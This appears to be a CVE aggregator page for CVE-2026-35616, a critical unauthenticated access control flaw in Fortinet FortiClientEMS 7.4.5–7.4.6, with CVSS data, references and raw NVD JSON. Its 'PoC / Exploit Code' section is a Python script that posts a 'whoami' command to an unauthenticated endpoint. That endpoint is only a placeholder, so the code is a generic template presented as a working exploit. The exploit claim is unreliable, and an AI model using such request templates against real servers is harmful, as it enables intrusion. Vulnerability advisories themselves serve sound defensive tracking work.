CVE-2026-35616

Description

A improper access control vulnerability in Fortinet FortiClientEMS 7.4.5 through 7.4.6 may allow an unauthenticated attacker to execute unauthorized code or commands via crafted requests.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fortinet:forticlientems:7.4.5:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:fortinet:forticlientems:7.4.6:*:*:*:*:*:*:* - VULNERABLE

Fortinet FortiClientEMS 7.4.5

Fortinet FortiClientEMS 7.4.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "http://<TARGET_IP>:<PORT>/api/some_vulnerable_endpoint"

# Crafted payload to execute unauthorized code
payload = {
    "command": "whoami",
    "arg": "-a"
}

try:
    # Send malicious request without authentication
    response = requests.post(target_url, json=payload, verify=False, timeout=10)
    
    if response.status_code == 200:
        print("[+] Exploit successful! Response:")
        print(response.text)
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[!] Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35616
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35616
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35616/
[4] VulDB https://vuldb.com/cve/CVE-2026-35616
[5] https://fortiguard.fortinet.com/psirt/FG-IR-26-099
[6] https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-35616

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35616", "sourceIdentifier": "[email protected]", "published": "2026-04-04T01:16:39.720", "lastModified": "2026-04-06T18:12:57.863", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A improper access control vulnerability in Fortinet FortiClientEMS 7.4.5 through 7.4.6 may allow an unauthenticated attacker to execute unauthorized code or commands via crafted requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "cisaExploitAdd": "2026-04-06", "cisaActionDue": "2026-04-09", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "Fortinet FortiClient EMS Improper Access Control Vulnerability", "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:forticlientems:7.4.5:*:*:*:*:*:*:*", "matchCriteriaId": "7CFAA44F-6B24-4702-93B8-94B703D684D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:forticlientems:7.4.6:*:*:*:*:*:*:*", "matchCriteriaId": "4AA9A954-1D6F-4B4D-9670-1DCF14F59737"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-099", "source": "[email protected]", "tags": ["Vendor Advisory", "Patch"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-35616", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}]}}